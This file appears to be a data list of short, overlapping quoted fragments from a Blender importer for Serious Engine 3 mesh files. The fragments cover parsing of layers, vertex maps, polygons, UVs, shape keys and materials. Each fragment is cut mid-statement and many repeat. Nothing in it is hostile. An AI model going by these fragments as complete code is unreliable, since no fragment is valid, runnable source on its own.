"in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge",
"#open vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem =",
"layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex",
"in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for",
"0.0), ( 0.0, 0.0, 1.0, 0.0), ( 0.0, 1.0, 0.0, 0.0), ( 0.0,",
"se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps:",
"file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl()",
"= material for face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world = tranf_mat bpy.ops.object.transform_apply(rotation=True)",
"for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0,",
"weight_pointers = vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values()",
"real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return uvs_data def read_file(operator, context): from mathutils",
"in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index]",
"= se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx -",
"se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index = se3_layer.vertex_maps[se3_vertex_map_index].type_index vertex_groups[vertex_group_index].add([vertex_index], se3_vertex_weight, 'REPLACE') if se3_layer.surface_maps: materials = [] for",
"se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers",
"maps block file_query.follows_block_end_decl() #close layer block processed_layers += 1 file_query.follows_block_end_decl() #close layers block",
"bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for",
"se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex",
"= 0 while processed_layers < num_of_layers: layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl()",
"map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps",
"se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0],",
"shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp",
"in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index =",
"= type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems = 0",
"fgon_face = [] for tessed_index in tessed_face: fgon_face.append(ngon_face[tessed_index]) fgon_faces.append(tuple(fgon_face)) return fgon_faces def edge_not_in(which_edge,",
"- 1 for current_index in range(num_of_indices): next_index = se3_vertex_indices[current_index + 1] if current_index",
"for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in",
"= Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0), ( 0.0, 1.0,",
"False return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = [] for",
"0 is_last_pointer = False last_pointer_index = num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers:",
"mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps = 0 num_of_texcoord_maps",
"ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face",
"= file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index",
"= Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps if se3_weight_maps: vertex_groups = [] for",
"= edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0]",
"= [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = [] for i in range(num_of_texcoord_maps): uvs_data.append([])",
"+= 1 map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\")",
"file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer)",
"face_edge in face_edges: is_fgon_edge = edge_not_in(face_edge, bound_edges) edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count +=",
"#close vertex map block file_query.follows_block_end_decl() #close vertex maps block num_of_verts = file_query.get_long_value(\"VERTICES\") file_query.follows_block_begin_decl()",
"1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons block",
"se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs +=",
"= num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index",
"def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in",
"+= 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close layer block",
"(edge[0], edge[1]) if which_edge == edge or which_edge == edge_rev: return False return",
"other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index",
"in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name)",
"elif map_type == se3.VERTEX_MAP_TYPE_WEIGHT: type_index = num_of_weight_maps get_map_elem = file_query.get_weight_elem num_of_weight_maps += 1",
"for edge in edges: edge_rev = (edge[0], edge[1]) if which_edge == edge or",
"= mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index]",
"vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type",
"enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]]",
"[] for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material",
"file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers =",
"if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]]",
"processed_poly_maps += 1 layer.polygon_maps.append(poly_map) layer.surface_maps.append(poly_map) file_query.follows_block_end_decl() #close polygon maps block file_query.follows_block_end_decl() #close layer",
"+= 1 file_query.follows_block_end_decl() #close layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices =",
"( 0.0, 0.0, 1.0, 0.0), ( 0.0, 1.0, 0.0, 0.0), ( 0.0, 0.0,",
"se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp =",
"edges = [] real_faces = [] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices =",
"map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps",
"material for face in mesh.polygons: face.material_index = material_indices[face.index] obj.matrix_world = tranf_mat bpy.ops.object.transform_apply(rotation=True) context.view_layer.update()",
"for se3_surface_map in se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for",
"se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx,",
"map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count block poly_map =",
"se3_vertex in se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts):",
"for idx, other_mp in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert =",
"< num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values() processed_values",
"file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers = 0 while processed_layers < num_of_layers: layer_name",
"[] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices - 1 for current_index in range(num_of_indices):",
"edges): for edge in edges: edge_rev = (edge[0], edge[1]) if which_edge == edge",
"= get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face,",
"fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0] for real_face in real_faces] mesh =",
"+= 1 file_query.follows_block_end_decl() #close elements block processed_maps += 1 layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex",
"vertex.weight_pointers uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers =",
"= mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data): real_tex_face = real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index]",
"= [] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face = []",
"file_query.follows_block_end_decl() #close layers block return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps",
"mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices if",
"block layer = se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps",
"material_indices = [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index]",
"map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: type_index = num_of_texcoord_maps get_map_elem = file_query.get_texcoord_elem num_of_texcoord_maps += 1 elif",
"element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl() #close element block processed_elems += 1 file_query.follows_block_end_decl() #close elements",
"= file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer)",
"ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face = [] for tessed_index in tessed_face:",
"real_faces[face_index][1][uv_index] poly = mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat",
"type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems = 0 while",
"se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers: for se3_weight_pointer",
"which_edge == edge or which_edge == edge_rev: return False return True def get_bl_face_uv_data(real_face,",
"* len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in",
"in enumerate(other_morph_pnts): type_idx = se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data =",
"[] real_faces = [] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices = [] for",
"[] file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value =",
"edge[1]) if which_edge == edge or which_edge == edge_rev: return False return True",
"= False last_pointer_index = num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers",
"processed_values = 0 is_last_value = False last_value_idx = num_of_values - 1 while processed_values",
"num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index =",
"map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() #",
"map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon count",
"for se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]]",
"elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block",
"num_of_values: if processed_values == last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl()",
"mesh.edges[fgon_edge_index].is_fgon = True for uv_index, se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop =",
"num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems = 0 while processed_elems",
"num_of_processed_vertices += 1 file_query.follows_block_end_decl() #close vertices block num_of_polys = file_query.get_long_value(\"POLYGONS\") file_query.follows_block_begin_decl() #open polygons",
"is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if",
"enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data in enumerate(uv_tex.data): real_tex_face",
"processed_elems = 0 while processed_elems < num_of_map_elems: file_query.follows_block_begin_decl() #open element block map.elements.append(get_map_elem()) file_query.follows_block_end_decl()",
"edges.append((se3_vertex_indices[current_index], next_index)) return edges def get_bl_fgons(vertices, ngon_face): fgon_faces = [] tessed_faces = ngon_tesselate(vertices,",
"in bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data): try: data =",
"processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name = file_query.get_map_name()",
"fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face) for face_edge in",
"se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers = se3_vertex.weight_pointers if se3_weight_pointers:",
"uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices += 1 file_query.follows_block_end_decl()",
"= num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer",
"num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer)",
"if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge",
"( 0.0, 0.0, 0.0, 1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj",
"se3_layer.surface_maps: material = bpy.data.materials.new(se3_surface_map.name) materials.append(material) bpy.ops.object.material_slot_add() obj.material_slots[-1].material = material for face in mesh.polygons:",
"edge_index_count += 1 else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces =",
"num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer =",
"ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges = get_bl_edges(ngon_face[0]) fgon_faces = get_bl_fgons(vertices, ngon_face[0]) for fgon_face",
"shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in se3_vertices: other_morph_pnts",
"\"\"\" if edge_not_in(face_edge, edges): edges.append(face_edge) edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count += 1",
"processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count",
"[] for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index in bl_face: real_index = real_face[0].index(vert_index)",
"polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count block processed_poly_maps += 1",
"in enumerate(uvs_data): try: data = real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data) return uvs_data",
"se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices",
"if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex",
"len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map in enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons:",
"+= 1 faces = [real_face[0] for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\")",
"weight_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex",
"def edge_not_in(which_edge, edges): for edge in edges: edge_rev = (edge[0], edge[1]) if which_edge",
"(1,0) uv_data.append(data) return uvs_data def read_file(operator, context): from mathutils import (Matrix, Vector) import",
"mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True for uv_index,",
"se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) +",
"file_query.follows_block_begin_decl() #open vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem",
"file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps",
"= se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges",
"0 while processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon block num_of_values",
"+ 1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices =",
"== last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type =",
"in range(num_of_texcoord_maps): uvs_data.append([]) se3_texcoord_maps = se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index]",
"import se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version)",
"vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH: morph_pointers.append(vertex_data_pointer) elif vertex_map_type == se3.VERTEX_MAP_TYPE_WEIGHT: weight_pointers.append(vertex_data_pointer)",
"num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type",
"uvs_data]) def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices -",
"len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face",
"num_of_uv_tex = len(real_face[1]) uvs_data = [] for i in range(num_of_uv_tex): uvs_data.append([]) for vert_index",
"maps block processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name",
"for uv_index, uv_pointer in enumerate(se3_vertex.uv_pointers): elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) )",
"return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data =",
"se3_vertices: other_morph_pnts = se3_vertex.non_basic_morph_pointers if other_morph_pnts: for idx, other_mp in enumerate(other_morph_pnts): type_idx =",
"= [] se3_surface_map_indices = [0] * len(se3_layer.polygons) material_indices = [] for se3_surface_map_index, se3_surface_map",
"0 is_last_value = False last_value_idx = num_of_values - 1 while processed_values < num_of_values:",
"polygon block layer.polygons.append(tuple(poly)) processed_polys += 1 file_query.follows_block_end_decl() #close polygons block num_of_poly_maps = file_query.get_long_value(\"POLYGON_MAPS\")",
"is_last_value = False last_value_idx = num_of_values - 1 while processed_values < num_of_values: if",
"file_query.follows_block_begin_decl() #open polygon count block poly_map = se3.PolygonMap(map_type, map_name, map_smoothing_angle) processed_poly_idxs = 0",
"= True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly)) processed_polys +=",
"processed_polys < num_of_polys: poly = [] file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values()",
"uv_pointers = vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0",
"= se3_vertex_indices[current_index + 1] if current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return",
"face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in face_edges: \"\"\"",
"edge_index_count += 1 faces = [real_face[0] for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test",
"se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name)) for se3_vertex in",
"[] tessed_faces = ngon_tesselate(vertices, ngon_face) for tessed_face in tessed_faces: fgon_face = [] for",
"map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl() # open elements block processed_elems =",
"ngon_tessellate from . import se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\")",
"num_of_values = file_query.get_num_of_values() processed_values = 0 is_last_value = False last_value_idx = num_of_values -",
"se3_vertex_indices[current_index + 1] if current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index)) return edges",
"elem = se3_texcoord_maps[uv_index].elements[uv_pointer[1]] uvs_data[uv_index].append(tuple([elem[0], (-elem[1]) + 1]) ) return tuple([tuple(new_indices), uvs_data]) def get_bl_edges(se3_vertex_indices):",
"= bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges, faces) for fgon_edge_index in fgon_edge_indices: mesh.edges[fgon_edge_index].is_fgon = True",
"faces = [real_face[0] for real_face in real_faces] mesh = bpy.data.meshes.new(\"Test mesh\") mesh.from_pydata(vertices, edges,",
"num_of_maps: map_type = file_query.get_map_type() map_name = file_query.get_map_name() file_query.follows_block_begin_decl() #open vertex map block if",
"vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type if vertex_map_type == se3.VERTEX_MAP_TYPE_MORPH:",
"= se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0])",
"num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type ==",
"se3_texcoord_map in enumerate(se3_layer.texcoord_maps): uv_tex = mesh.uv_layers.new(se3_texcoord_map.name) uv_loop = mesh.uv_layers[0] for face_index, tex_data in",
"= real_tex_face[j] tranf_mat = Matrix(((-1.0, 0.0, 0.0, 0.0), ( 0.0, 0.0, 1.0, 0.0),",
"file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer = False last_pointer_index = num_of_pointers - 1 while",
"se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index =",
"= vertex.uv_pointers file_query.follows_block_begin_decl() #open vertex block num_of_pointers = file_query.get_num_of_values() num_of_processed_pointers = 0 is_last_pointer",
"block if map_type == se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative =",
"last_pointer_index: is_last_pointer = True vertex_data_pointer = file_query.get_vertex_data_pointer(is_last_pointer) vertex_map_index = vertex_data_pointer[0] vertex_map_type = layer.vertex_maps[vertex_map_index].type",
"next_index = se3_vertex_indices[current_index + 1] if current_index != last_index else se3_vertex_indices[0] edges.append((se3_vertex_indices[current_index], next_index))",
